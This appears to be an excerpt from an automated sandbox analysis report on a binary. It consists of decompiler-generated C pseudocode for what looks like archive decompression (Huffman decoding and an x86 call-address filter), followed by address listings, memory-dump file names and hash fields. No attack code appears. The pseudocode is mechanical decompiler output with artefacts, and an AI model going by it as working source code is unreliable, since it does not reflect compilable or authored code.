                                                                            									goto L27;
                                                                            								}
                                                                            								_t442 = _t207;
                                                                            								goto L27;
                                                                            							} else {
                                                                            								_t405 = 0x10;
                                                                            								_t436 = _t416 >> _t405 - _t206;
                                                                            								_t408 = ( *(_t436 + _t440 + 0xb8) & 0x000000ff) +  *(_t438 + 4);
                                                                            								 *_t438 =  *_t438 + (_t408 >> 3);
                                                                            								 *(_t438 + 4) = _t408 & 0x00000007;
                                                                            								_t324 =  *(_t440 + 0x4b8 + _t436 * 2) & 0x0000ffff;
                                                                            								L28:
                                                                            								__eflags = _t324 - 0x100;
                                                                            								if(_t324 >= 0x100) {
                                                                            									__eflags = _t324 - 0x106;
                                                                            									if(_t324 < 0x106) {
                                                                            										__eflags = _t324 - 0x100;
                                                                            										if(_t324 != 0x100) {
                                                                            											__eflags = _t324 - 0x101;
                                                                            											if(_t324 != 0x101) {
                                                                            												_t212 = 3;
                                                                            												 *_t295 = _t212;
                                                                            												_t295[2] = _t324 - 0x102;
                                                                            												_t214 = E0019A4ED(_t438);
                                                                            												_t215 =  *(_t440 + 0x2d78);
                                                                            												_t420 = _t214 & 0x0000fffe;
                                                                            												__eflags = _t420 -  *((intOrPtr*)(_t440 + 0x2cf8 + _t215 * 4));
                                                                            												if(_t420 >=  *((intOrPtr*)(_t440 + 0x2cf8 + _t215 * 4))) {
                                                                            													_t296 = 0xf;
                                                                            													_t216 = _t215 + 1;
                                                                            													__eflags = _t216 - _t296;
                                                                            													if(_t216 >= _t296) {
                                                                            														L85:
                                                                            														_t327 =  *(_t438 + 4) + _t296;
                                                                            														 *(_t438 + 4) = _t327 & 0x00000007;
                                                                            														_t218 = _t327 >> 3;
                                                                            														 *_t438 =  *_t438 + _t218;
                                                                            														_t329 = 0x10;
                                                                            														_t332 =  *((intOrPtr*)(_t440 + 0x2d38 + _t296 * 4)) + (_t420 -  *((intOrPtr*)(_t440 + 0x2cf4 + _t296 * 4)) >> _t329 - _t296);
                                                                            														__eflags = _t332 -  *((intOrPtr*)(_t440 + 0x2cf4));
                                                                            														asm("sbb eax, eax");
                                                                            														_t219 = _t218 & _t332;
                                                                            														__eflags = _t219;
                                                                            														_t220 =  *(_t440 + 0x397c + _t219 * 2) & 0x0000ffff;
                                                                            														L86:
                                                                            														_t297 = _t220 & 0x0000ffff;
                                                                            														__eflags = _t297 - 8;
                                                                            														if(_t297 >= 8) {
                                                                            															_t221 = 3;
                                                                            															_t446 = (_t297 >> 2) - 1;
                                                                            															_t301 = ((_t297 & _t221 | 0x00000004) << _t446) + 2;
                                                                            															__eflags = _t446;
                                                                            															if(_t446 != 0) {
                                                                            																_t223 = E0019A4ED(_t438);
                                                                            																_t335 = 0x10;
                                                                            																_t301 = _t301 + (_t223 >> _t335 - _t446);
                                                                            																_t338 =  *(_t438 + 4) + _t446;
                                                                            																 *_t438 =  *_t438 + (_t338 >> 3);
                                                                            																_t339 = _t338 & 0x00000007;
                                                                            																__eflags = _t339;
                                                                            																 *(_t438 + 4) = _t339;
                                                                            															}
                                                                            														} else {
                                                                            															_t301 = _t297 + 2;
                                                                            														}
                                                                            														( *(_t455 + 0x24))[1] = _t301;
                                                                            														L91:
                                                                            														_t414 =  *(_t455 + 0x14);
                                                                            														_t201 =  *(_t455 + 0x18);
                                                                            														_t293 =  *(_t455 + 0x3c);
                                                                            														_t443 =  *((intOrPtr*)(_t455 + 0x1c));
                                                                            														while(1) {
                                                                            															_t314 =  *_t438;
                                                                            															__eflags = _t314 - _t293;
                                                                            															if(_t314 < _t293) {
                                                                            																goto L15;
                                                                            															}
                                                                            															goto L9;
                                                                            														}
                                                                            													}
                                                                            													_t341 = _t440 + 0x2cf8 + _t216 * 4;
                                                                            													while(1) {
                                                                            														__eflags = _t420 -  *_t341;
                                                                            														if(_t420 <  *_t341) {
                                                                            															break;
                                                                            														}
                                                                            														_t216 = _t216 + 1;
                                                                            														_t341 = _t341 + 4;
                                                                            														__eflags = _t216 - 0xf;
                                                                            														if(_t216 < 0xf) {
                                                                            															continue;
                                                                            														}
                                                                            														goto L85;
                                                                            													}
                                                                            													_t296 = _t216;
                                                                            													goto L85;
                                                                            												}
                                                                            												_t342 = 0x10;
                                                                            												_t423 = _t420 >> _t342 - _t215;
                                                                            												_t345 = ( *(_t423 + _t440 + 0x2d7c) & 0x000000ff) +  *(_t438 + 4);
                                                                            												 *_t438 =  *_t438 + (_t345 >> 3);
                                                                            												 *(_t438 + 4) = _t345 & 0x00000007;
                                                                            												_t220 =  *(_t440 + 0x317c + _t423 * 2) & 0x0000ffff;
                                                                            												goto L86;
                                                                            											}
                                                                            											 *_t295 = 2;
                                                                            											L33:
                                                                            											_t414 =  *(_t455 + 0x14);
                                                                            											_t201 =  *(_t455 + 0x18);
                                                                            											_t293 =  *(_t455 + 0x3c);
                                                                            											continue;
                                                                            										}
                                                                            										_push(_t455 + 0x28);
                                                                            										E001A3564(_t443, _t438);
                                                                            										_t295[1] =  *(_t455 + 0x28) & 0x000000ff;
                                                                            										_t295[2] =  *(_t455 + 0x2c);
                                                                            										_t424 = 4;
                                                                            										 *_t295 = _t424;
                                                                            										_t233 =  *(_t440 + 0x4ad8);
                                                                            										_t349 = _t233 * 0xc +  *(_t440 + 0x4ad4);
                                                                            										 *(_t440 + 0x4ad8) = _t233 + 1;
                                                                            										_t349[1] =  *(_t455 + 0x34) & 0x000000ff;
                                                                            										 *_t349 = _t424;
                                                                            										_t349[2] =  *(_t455 + 0x30);
                                                                            										goto L33;
                                                                            									}
                                                                            									_t237 = _t324 - 0x106;
                                                                            									__eflags = _t237 - 8;
                                                                            									if(_t237 >= 8) {
                                                                            										_t350 = 3;
                                                                            										_t304 = (_t237 >> 2) - 1;
                                                                            										_t237 = (_t237 & _t350 | 0x00000004) << _t304;
                                                                            										__eflags = _t237;
                                                                            									} else {
                                                                            										_t304 = 0;
                                                                            									}
                                                                            									_t447 = _t237 + 2;
                                                                            									 *(_t455 + 0x10) = _t447;
                                                                            									__eflags = _t304;
                                                                            									if(_t304 != 0) {
                                                                            										_t274 = E0019A4ED(_t438);
                                                                            										_t398 = 0x10;
                                                                            										_t401 =  *(_t438 + 4) + _t304;
                                                                            										 *(_t455 + 0x10) = _t447 + (_t274 >> _t398 - _t304);
                                                                            										 *_t438 =  *_t438 + (_t401 >> 3);
                                                                            										_t402 = _t401 & 0x00000007;
                                                                            										__eflags = _t402;
                                                                            										 *(_t438 + 4) = _t402;
                                                                            									}
                                                                            									_t240 = E0019A4ED(_t438);
                                                                            									_t241 =  *(_t440 + 0xfa0);
                                                                            									_t426 = _t240 & 0x0000fffe;
                                                                            									__eflags = _t426 -  *((intOrPtr*)(_t440 + 0xf20 + _t241 * 4));
                                                                            									if(_t426 >=  *((intOrPtr*)(_t440 + 0xf20 + _t241 * 4))) {
                                                                            										_t305 = 0xf;
                                                                            										_t242 = _t241 + 1;
                                                                            										__eflags = _t242 - _t305;
                                                                            										if(_t242 >= _t305) {
                                                                            											L49:
                                                                            											_t354 =  *(_t438 + 4) + _t305;
                                                                            											 *(_t438 + 4) = _t354 & 0x00000007;
                                                                            											_t244 = _t354 >> 3;
                                                                            											 *_t438 =  *_t438 + _t244;
                                                                            											_t356 = 0x10;
                                                                            											_t359 =  *((intOrPtr*)(_t440 + 0xf60 + _t305 * 4)) + (_t426 -  *((intOrPtr*)(_t440 + 0xf1c + _t305 * 4)) >> _t356 - _t305);
                                                                            											__eflags = _t359 -  *((intOrPtr*)(_t440 + 0xf1c));
                                                                            											asm("sbb eax, eax");
                                                                            											_t245 = _t244 & _t359;
                                                                            											__eflags = _t245;
                                                                            											_t246 =  *(_t440 + 0x1ba4 + _t245 * 2) & 0x0000ffff;
                                                                            											goto L50;
                                                                            										}
                                                                            										_t391 = _t440 + 0xf20 + _t242 * 4;
                                                                            										while(1) {
                                                                            											__eflags = _t426 -  *_t391;
                                                                            											if(_t426 <  *_t391) {
                                                                            												break;
                                                                            											}
                                                                            											_t242 = _t242 + 1;
                                                                            											_t391 = _t391 + 4;
                                                                            											__eflags = _t242 - 0xf;
                                                                            											if(_t242 < 0xf) {
                                                                            												continue;
                                                                            											}
                                                                            											goto L49;
                                                                            										}
                                                                            										_t305 = _t242;
                                                                            										goto L49;
                                                                            									} else {
                                                                            										_t392 = 0x10;
                                                                            										_t434 = _t426 >> _t392 - _t241;
                                                                            										_t395 = ( *(_t434 + _t440 + 0xfa4) & 0x000000ff) +  *(_t438 + 4);
                                                                            										 *_t438 =  *_t438 + (_t395 >> 3);
                                                                            										 *(_t438 + 4) = _t395 & 0x00000007;
                                                                            										_t246 =  *(_t440 + 0x13a4 + _t434 * 2) & 0x0000ffff;
                                                                            										L50:
                                                                            										_t247 = _t246 & 0x0000ffff;
                                                                            										__eflags = _t247 - 4;
                                                                            										if(_t247 >= 4) {
                                                                            											_t308 = (_t247 >> 1) - 1;
                                                                            											_t247 = (_t247 & 0x00000001 | 0x00000002) << _t308;
                                                                            											__eflags = _t247;
                                                                            										} else {
                                                                            											_t308 = 0;
                                                                            										}
                                                                            										_t250 = _t247 + 1;
                                                                            										 *(_t455 + 0x20) = _t250;
                                                                            										_t448 = _t250;
                                                                            										__eflags = _t308;
                                                                            										if(_t308 == 0) {
                                                                            											L68:
                                                                            											__eflags = _t448 - 0x100;
                                                                            											if(_t448 > 0x100) {
                                                                            												_t253 =  *(_t455 + 0x10) + 1;
                                                                            												 *(_t455 + 0x10) = _t253;
                                                                            												__eflags = _t448 - 0x2000;
                                                                            												if(_t448 > 0x2000) {
                                                                            													_t254 = _t253 + 1;
                                                                            													 *(_t455 + 0x10) = _t254;
                                                                            													__eflags = _t448 - 0x40000;
                                                                            													if(_t448 > 0x40000) {
                                                                            														_t255 = _t254 + 1;
                                                                            														__eflags = _t255;
                                                                            														 *(_t455 + 0x10) = _t255;
                                                                            													}
                                                                            												}
                                                                            											}
                                                                            											_t251 =  *(_t455 + 0x24);
                                                                            											 *_t251 = 1;
                                                                            											_t251[1] =  *(_t455 + 0x10);
                                                                            											_t251[2] = _t448;
                                                                            											goto L91;
                                                                            										} else {
                                                                            											__eflags = _t308 - 4;
                                                                            											if(__eflags < 0) {
                                                                            												_t256 = E001A7D76(_t438);
                                                                            												_t363 = 0x20;
                                                                            												_t448 = (_t256 >> _t363 - _t308) +  *(_t455 + 0x20);
                                                                            												_t366 =  *(_t438 + 4) + _t308;
                                                                            												 *_t438 =  *_t438 + (_t366 >> 3);
                                                                            												_t367 = _t366 & 0x00000007;
                                                                            												__eflags = _t367;
                                                                            												 *(_t438 + 4) = _t367;
                                                                            												goto L68;
                                                                            											}
                                                                            											if(__eflags > 0) {
                                                                            												_t269 = E001A7D76(_t438);
                                                                            												_t384 = 0x24;
                                                                            												_t448 = (_t269 >> _t384 - _t308 << 4) +  *(_t455 + 0x20);
                                                                            												_t388 =  *(_t438 + 4) + 0xfffffffc + _t308;
                                                                            												 *_t438 =  *_t438 + (_t388 >> 3);
                                                                            												_t389 = _t388 & 0x00000007;
                                                                            												__eflags = _t389;
                                                                            												 *(_t438 + 4) = _t389;
                                                                            											}
                                                                            											_t259 = E0019A4ED(_t438);
                                                                            											_t260 =  *(_t440 + 0x1e8c);
                                                                            											_t430 = _t259 & 0x0000fffe;
                                                                            											__eflags = _t430 -  *((intOrPtr*)(_t440 + 0x1e0c + _t260 * 4));
                                                                            											if(_t430 >=  *((intOrPtr*)(_t440 + 0x1e0c + _t260 * 4))) {
                                                                            												_t309 = 0xf;
                                                                            												_t261 = _t260 + 1;
                                                                            												__eflags = _t261 - _t309;
                                                                            												if(_t261 >= _t309) {
                                                                            													L65:
                                                                            													_t370 =  *(_t438 + 4) + _t309;
                                                                            													 *(_t438 + 4) = _t370 & 0x00000007;
                                                                            													_t263 = _t370 >> 3;
                                                                            													 *_t438 =  *_t438 + _t263;
                                                                            													_t372 = 0x10;
                                                                            													_t375 =  *((intOrPtr*)(_t440 + 0x1e4c + _t309 * 4)) + (_t430 -  *((intOrPtr*)(_t440 + 0x1e08 + _t309 * 4)) >> _t372 - _t309);
                                                                            													__eflags = _t375 -  *((intOrPtr*)(_t440 + 0x1e08));
                                                                            													asm("sbb eax, eax");
                                                                            													_t264 = _t263 & _t375;
                                                                            													__eflags = _t264;
                                                                            													_t265 =  *(_t440 + 0x2a90 + _t264 * 2) & 0x0000ffff;
                                                                            													goto L66;
                                                                            												}
                                                                            												_t377 = _t440 + 0x1e0c + _t261 * 4;
                                                                            												while(1) {
                                                                            													__eflags = _t430 -  *_t377;
                                                                            													if(_t430 <  *_t377) {
                                                                            														break;
                                                                            													}
                                                                            													_t261 = _t261 + 1;
                                                                            													_t377 = _t377 + 4;
                                                                            													__eflags = _t261 - 0xf;
                                                                            													if(_t261 < 0xf) {
                                                                            														continue;
                                                                            													}
                                                                            													goto L65;
                                                                            												}
                                                                            												_t309 = _t261;
                                                                            												goto L65;
                                                                            											} else {
                                                                            												_t378 = 0x10;
                                                                            												_t433 = _t430 >> _t378 - _t260;
                                                                            												_t381 = ( *(_t433 + _t440 + 0x1e90) & 0x000000ff) +  *(_t438 + 4);
                                                                            												 *_t438 =  *_t438 + (_t381 >> 3);
                                                                            												 *(_t438 + 4) = _t381 & 0x00000007;
                                                                            												_t265 =  *(_t440 + 0x2290 + _t433 * 2) & 0x0000ffff;
                                                                            												L66:
                                                                            												_t448 = _t448 + (_t265 & 0x0000ffff);
                                                                            												goto L68;
                                                                            											}
                                                                            										}
                                                                            									}
                                                                            								}
                                                                            								__eflags =  *(_t440 + 0x4ad8) - 1;
                                                                            								if( *(_t440 + 0x4ad8) <= 1) {
                                                                            									L34:
                                                                            									 *_t295 =  *_t295 & 0x00000000;
                                                                            									_t295[2] = _t324;
                                                                            									_t295[1] = 0;
                                                                            									goto L33;
                                                                            								}
                                                                            								__eflags =  *(_t295 - 0xc);
                                                                            								if( *(_t295 - 0xc) != 0) {
                                                                            									goto L34;
                                                                            								}
                                                                            								_t279 =  *(_t295 - 8) & 0x0000ffff;
                                                                            								_t435 = 3;
                                                                            								__eflags = _t279 - _t435;
                                                                            								if(_t279 >= _t435) {
                                                                            									goto L34;
                                                                            								}
                                                                            								_t280 = _t279 + 1;
                                                                            								 *(_t295 - 8) = _t280;
                                                                            								 *((_t280 & 0x0000ffff) + _t295 - 4) = _t324;
                                                                            								_t68 = _t440 + 0x4ad8;
                                                                            								 *_t68 =  *(_t440 + 0x4ad8) - 1;
                                                                            								__eflags =  *_t68;
                                                                            								goto L33;
                                                                            							}
                                                                            						}
                                                                            					}
                                                                            					 *((char*)(_t440 + 0x4ad0)) = 1;
                                                                            					goto L94;
                                                                            				} else {
                                                                            					 *((char*)(_t440 + 0x2c)) = 1;
                                                                            					_push(_t440 + 0x30);
                                                                            					_push(_t440 + 0x18);
                                                                            					_push(_t440 + 4);
                                                                            					_t291 = E001A397F(__ecx);
                                                                            					if(_t291 != 0) {
                                                                            						goto L3;
                                                                            					} else {
                                                                            						 *((char*)(_t440 + 0x4ad0)) = 1;
                                                                            						return _t291;
                                                                            					}
                                                                            				}
                                                                            			}

                                                                            0x001a6c6d
                                                                            0x001a6c6f
                                                                            0x001a6c76
                                                                            0x001a6c78
                                                                            0x001a6c78
                                                                            0x001a6c7b
                                                                            0x001a6c7b
                                                                            0x001a6c3e
                                                                            0x001a6c3e
                                                                            0x001a6c3e
                                                                            0x001a6c82
                                                                            0x001a6c86
                                                                            0x001a6c86
                                                                            0x001a6c8a
                                                                            0x001a6c8e
                                                                            0x001a6c92
                                                                            0x001a6723
                                                                            0x001a6723
                                                                            0x001a6725
                                                                            0x001a6727
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x001a6727
                                                                            0x001a6723
                                                                            0x001a6be7
                                                                            0x001a6bea
                                                                            0x001a6bea
                                                                            0x001a6bec
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x001a6bee
                                                                            0x001a6bef
                                                                            0x001a6bf2
                                                                            0x001a6bf5
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x001a6bf7
                                                                            0x001a6bf9
                                                                            0x00000000
                                                                            0x001a6bf9
                                                                            0x001a6bb2
                                                                            0x001a6bb5
                                                                            0x001a6bbf
                                                                            0x001a6bc7
                                                                            0x001a6bcc
                                                                            0x001a6bcf
                                                                            0x00000000
                                                                            0x001a6bcf
                                                                            0x001a6b79
                                                                            0x001a6886
                                                                            0x001a6886
                                                                            0x001a688a
                                                                            0x001a688e
                                                                            0x00000000
                                                                            0x001a688e
                                                                            0x001a6b28
                                                                            0x001a6b2a
                                                                            0x001a6b34
                                                                            0x001a6b3c
                                                                            0x001a6b41
                                                                            0x001a6b42
                                                                            0x001a6b44
                                                                            0x001a6b4d
                                                                            0x001a6b54
                                                                            0x001a6b5f
                                                                            0x001a6b67
                                                                            0x001a6b69
                                                                            0x00000000
                                                                            0x001a6b69
                                                                            0x001a68b1
                                                                            0x001a68b7
                                                                            0x001a68ba
                                                                            0x001a68c7
                                                                            0x001a68ca
                                                                            0x001a68d0
                                                                            0x001a68d0
                                                                            0x001a68bc
                                                                            0x001a68bc
                                                                            0x001a68bc
                                                                            0x001a68d2
                                                                            0x001a68d5
                                                                            0x001a68d9
                                                                            0x001a68db
                                                                            0x001a68df
                                                                            0x001a68e6
                                                                            0x001a68f0
                                                                            0x001a68f2
                                                                            0x001a68fb
                                                                            0x001a68fd
                                                                            0x001a68fd
                                                                            0x001a6900
                                                                            0x001a6900
                                                                            0x001a6905
                                                                            0x001a690c
                                                                            0x001a6912
                                                                            0x001a6918
                                                                            0x001a691f
                                                                            0x001a694c
                                                                            0x001a694d
                                                                            0x001a694e
                                                                            0x001a6950
                                                                            0x001a696c
                                                                            0x001a696f
                                                                            0x001a6976
                                                                            0x001a6979
                                                                            0x001a697c
                                                                            0x001a6987
                                                                            0x001a6993
                                                                            0x001a6995
                                                                            0x001a699b
                                                                            0x001a699d
                                                                            0x001a699d
                                                                            0x001a699f
                                                                            0x00000000
                                                                            0x001a699f
                                                                            0x001a6958
                                                                            0x001a695b
                                                                            0x001a695b
                                                                            0x001a695d
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x001a695f
                                                                            0x001a6960
                                                                            0x001a6963
                                                                            0x001a6966
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x001a6968
                                                                            0x001a696a
                                                                            0x00000000
                                                                            0x001a6921
                                                                            0x001a6923
                                                                            0x001a6926
                                                                            0x001a6930
                                                                            0x001a6938
                                                                            0x001a693d
                                                                            0x001a6940
                                                                            0x001a69a7
                                                                            0x001a69a7
                                                                            0x001a69aa
                                                                            0x001a69ad
                                                                            0x001a69bd
                                                                            0x001a69c0
                                                                            0x001a69c0
                                                                            0x001a69af
                                                                            0x001a69af
                                                                            0x001a69af
                                                                            0x001a69c2
                                                                            0x001a69c3
                                                                            0x001a69c7
                                                                            0x001a69c9
                                                                            0x001a69cb
                                                                            0x001a6ad9
                                                                            0x001a6ad9
                                                                            0x001a6adf
                                                                            0x001a6ae5
                                                                            0x001a6ae6
                                                                            0x001a6aea
                                                                            0x001a6af0
                                                                            0x001a6af2
                                                                            0x001a6af3
                                                                            0x001a6af7
                                                                            0x001a6afd
                                                                            0x001a6aff
                                                                            0x001a6aff
                                                                            0x001a6b00
                                                                            0x001a6b00
                                                                            0x001a6afd
                                                                            0x001a6af0
                                                                            0x001a6b04
                                                                            0x001a6b0c
                                                                            0x001a6b12
                                                                            0x001a6b16
                                                                            0x00000000
                                                                            0x001a69d1
                                                                            0x001a69d1
                                                                            0x001a69d4
                                                                            0x001a6ab5
                                                                            0x001a6abe
                                                                            0x001a6ac6
                                                                            0x001a6aca
                                                                            0x001a6ad1
                                                                            0x001a6ad3
                                                                            0x001a6ad3
                                                                            0x001a6ad6
                                                                            0x00000000
                                                                            0x001a6ad6
                                                                            0x001a69da
                                                                            0x001a69de
                                                                            0x001a69e7
                                                                            0x001a69f5
                                                                            0x001a69f9
                                                                            0x001a6a00
                                                                            0x001a6a02
                                                                            0x001a6a02
                                                                            0x001a6a05
                                                                            0x001a6a05
                                                                            0x001a6a0a
                                                                            0x001a6a11
                                                                            0x001a6a17
                                                                            0x001a6a1d
                                                                            0x001a6a24
                                                                            0x001a6a51
                                                                            0x001a6a52
                                                                            0x001a6a53
                                                                            0x001a6a55
                                                                            0x001a6a71
                                                                            0x001a6a74
                                                                            0x001a6a7b
                                                                            0x001a6a7e
                                                                            0x001a6a81
                                                                            0x001a6a8c
                                                                            0x001a6a98
                                                                            0x001a6a9a
                                                                            0x001a6aa0
                                                                            0x001a6aa2
                                                                            0x001a6aa2
                                                                            0x001a6aa4
                                                                            0x00000000
                                                                            0x001a6aa4
                                                                            0x001a6a5d
                                                                            0x001a6a60
                                                                            0x001a6a60
                                                                            0x001a6a62
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x001a6a64
                                                                            0x001a6a65
                                                                            0x001a6a68
                                                                            0x001a6a6b
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x001a6a6d
                                                                            0x001a6a6f
                                                                            0x00000000
                                                                            0x001a6a26
                                                                            0x001a6a28
                                                                            0x001a6a2b
                                                                            0x001a6a35
                                                                            0x001a6a3d
                                                                            0x001a6a42
                                                                            0x001a6a45
                                                                            0x001a6aac
                                                                            0x001a6aaf
                                                                            0x00000000
                                                                            0x001a6aaf
                                                                            0x001a6a24
                                                                            0x001a69cb
                                                                            0x001a691f
                                                                            0x001a6859
                                                                            0x001a6860
                                                                            0x001a6897
                                                                            0x001a6897
                                                                            0x001a689c
                                                                            0x001a689f
                                                                            0x00000000
                                                                            0x001a689f
                                                                            0x001a6862
                                                                            0x001a6866
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x001a6868
                                                                            0x001a686e
                                                                            0x001a686f
                                                                            0x001a6872
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x001a6874
                                                                            0x001a6875
                                                                            0x001a687c
                                                                            0x001a6880
                                                                            0x001a6880
                                                                            0x001a6880
                                                                            0x00000000
                                                                            0x001a6880
                                                                            0x001a67d0
                                                                            0x001a6723
                                                                            0x001a66ec
                                                                            0x00000000
                                                                            0x001a66b7
                                                                            0x001a66ba
                                                                            0x001a66be
                                                                            0x001a66c2
                                                                            0x001a66c6
                                                                            0x001a66c7
                                                                            0x001a66ce
                                                                            0x00000000
                                                                            0x001a66d0
                                                                            0x001a66d0
                                                                            0x00000000
                                                                            0x001a66d0
                                                                            0x001a66ce

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: e4c5a05976191a686a2b332855ad20d3b2312d93676eb313e91a33e14f9b22a2
                                                                            • Instruction ID: 6561a064189dc33dcc748c50f9b71eef0310ec355c80f545b71d521ffdaaae82
                                                                            • Opcode Fuzzy Hash: e4c5a05976191a686a2b332855ad20d3b2312d93676eb313e91a33e14f9b22a2
                                                                            • Instruction Fuzzy Hash: 9812D2B56047068FC72DCF28C9906B9B3E1FF55308F18892EE597C7A85D378A894CB45
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            			E0019BAD1(signed int* __ecx) {
                                                                            				void* __edi;
                                                                            				signed int _t194;
                                                                            				signed int _t197;
                                                                            				void* _t204;
                                                                            				signed char _t205;
                                                                            				signed int _t215;
                                                                            				signed int _t217;
                                                                            				signed int _t218;
                                                                            				intOrPtr _t219;
                                                                            				signed int _t221;
                                                                            				signed int _t223;
                                                                            				void* _t234;
                                                                            				signed int _t235;
                                                                            				signed int _t238;
                                                                            				signed int _t266;
                                                                            				void* _t267;
                                                                            				void* _t268;
                                                                            				void* _t269;
                                                                            				void* _t270;
                                                                            				void* _t271;
                                                                            				signed int _t274;
                                                                            				intOrPtr _t275;
                                                                            				void* _t276;
                                                                            				signed char* _t277;
                                                                            				signed int _t278;
                                                                            				signed int _t279;
                                                                            				signed int _t281;
                                                                            				char _t282;
                                                                            				signed int _t284;
                                                                            				signed int _t285;
                                                                            				signed char _t289;
                                                                            				void* _t290;
                                                                            				intOrPtr _t292;
                                                                            				signed int _t293;
                                                                            				signed char* _t297;
                                                                            				signed int _t304;
                                                                            				signed int _t306;
                                                                            				signed int _t308;
                                                                            				signed char _t309;
                                                                            				signed int _t310;
                                                                            				intOrPtr _t311;
                                                                            				void* _t312;
                                                                            				void* _t313;
                                                                            				unsigned int _t316;
                                                                            				signed int _t317;
                                                                            				signed int _t319;
                                                                            				signed int _t320;
                                                                            				signed int _t321;
                                                                            				signed int _t322;
                                                                            				signed char _t323;
                                                                            				signed int _t324;
                                                                            				signed int _t325;
                                                                            				void* _t326;
                                                                            				void* _t327;
                                                                            				void* _t328;
                                                                            				signed int _t331;
                                                                            				signed char _t332;
                                                                            				signed int _t333;
                                                                            				signed char* _t334;
                                                                            				signed int _t335;
                                                                            				signed int _t336;
                                                                            				signed char _t338;
                                                                            				unsigned int _t340;
                                                                            				signed int _t345;
                                                                            				void* _t350;
                                                                            				signed int _t351;
                                                                            				signed int _t352;
                                                                            				signed int _t353;
                                                                            				void* _t354;
                                                                            				void* _t355;
                                                                            
                                                                            				_t311 =  *((intOrPtr*)(_t355 + 4));
                                                                            				_t339 = __ecx;
                                                                            				if(_t311 <= 0) {
                                                                            					L15:
                                                                            					return 1;
                                                                            				}
                                                                            				if(_t311 <= 2) {
                                                                            					_t194 = __ecx[5];
                                                                            					_t284 =  *__ecx;
                                                                            					_t340 = __ecx[7];
                                                                            					_t276 = _t194 - 4;
                                                                            					if(_t276 > 0x3fffc) {
                                                                            						L98:
                                                                            						return 0;
                                                                            					}
                                                                            					_t326 = 0;
                                                                            					_t197 = (_t194 & 0xffffff00 | _t311 == 0x00000002) + 0xe8;
                                                                            					 *(_t355 + 0x60) = _t197;
                                                                            					if(_t276 == 0) {
                                                                            						goto L15;
                                                                            					} else {
                                                                            						goto L88;
                                                                            					}
                                                                            					do {
                                                                            						L88:
                                                                            						_t312 =  *_t284;
                                                                            						_t284 = _t284 + 1;
                                                                            						_t327 = _t326 + 1;
                                                                            						_t340 = _t340 + 1;
                                                                            						if(_t312 == 0xe8 || _t312 == _t197) {
                                                                            							_t313 =  *_t284;
                                                                            							if(_t313 >= 0) {
                                                                            								_t191 = _t313 - 0x1000000; // -16777215
                                                                            								if(_t191 < 0) {
                                                                            									 *_t284 = _t313 - _t340;
                                                                            								}
                                                                            							} else {
                                                                            								if(_t340 + _t313 >= 0) {
                                                                            									_t190 = _t313 + 0x1000000; // 0x1000001
                                                                            									 *_t284 = _t190;
                                                                            								}
                                                                            							}
                                                                            							_t197 =  *(_t355 + 0x60);
                                                                            							_t284 = _t284 + 4;
                                                                            							_t326 = _t327 + 4;
                                                                            							_t340 = _t340 + 4;
                                                                            						}
                                                                            					} while (_t326 < _t276);
                                                                            					goto L15;
                                                                            				}
                                                                            				if(_t311 == 3) {
                                                                            					_t277 =  *__ecx;
                                                                            					_t328 = __ecx[5] - 0x15;
                                                                            					if(_t328 > 0x3ffeb) {
                                                                            						goto L98;
                                                                            					}
                                                                            					_t316 = __ecx[7] >> 4;
                                                                            					 *(_t355 + 0x28) = _t316;
                                                                            					if(_t328 == 0) {
                                                                            						goto L15;
                                                                            					}
                                                                            					_t331 = (_t328 - 1 >> 4) + 1;
                                                                            					 *(_t355 + 0x30) = _t331;
                                                                            					do {
                                                                            						_t204 = ( *_t277 & 0x1f) - 0x10;
                                                                            						if(_t204 < 0) {
                                                                            							goto L84;
                                                                            						}
                                                                            						_t205 =  *((intOrPtr*)(_t204 + 0x1cd070));
                                                                            						if(_t205 == 0) {
                                                                            							goto L84;
                                                                            						}
                                                                            						_t332 =  *(_t355 + 0x28);
                                                                            						_t285 = 0;
                                                                            						_t317 = _t205 & 0x000000ff;
                                                                            						 *((intOrPtr*)(_t355 + 0x64)) = 0;
                                                                            						 *(_t355 + 0x38) = _t317;
                                                                            						_t350 = 0x12;
                                                                            						do {
                                                                            							if((_t317 & 1) != 0) {
                                                                            								_t175 = _t350 + 0x18; // 0x2a
                                                                            								if(E0019C03A(_t277, _t175, 4) == 5) {
                                                                            									E0019C085(_t277, E0019C03A(_t277, _t350, 0x14) - _t332 & 0x000fffff, _t350, 0x14);
                                                                            								}
                                                                            								_t317 =  *(_t355 + 0x34);
                                                                            								_t285 =  *(_t355 + 0x60);
                                                                            							}
                                                                            							_t285 = _t285 + 1;
                                                                            							_t350 = _t350 + 0x29;
                                                                            							 *(_t355 + 0x60) = _t285;
                                                                            						} while (_t350 <= 0x64);
                                                                            						_t331 =  *(_t355 + 0x30);
                                                                            						_t316 =  *(_t355 + 0x28);
                                                                            						L84:
                                                                            						_t277 =  &(_t277[0x10]);
                                                                            						_t316 = _t316 + 1;
                                                                            						_t331 = _t331 - 1;
                                                                            						 *(_t355 + 0x28) = _t316;
                                                                            						 *(_t355 + 0x30) = _t331;
                                                                            					} while (_t331 != 0);
                                                                            					goto L15;
                                                                            				}
                                                                            				if(_t311 == 4) {
                                                                            					_t215 = __ecx[1];
                                                                            					_t289 = __ecx[5];
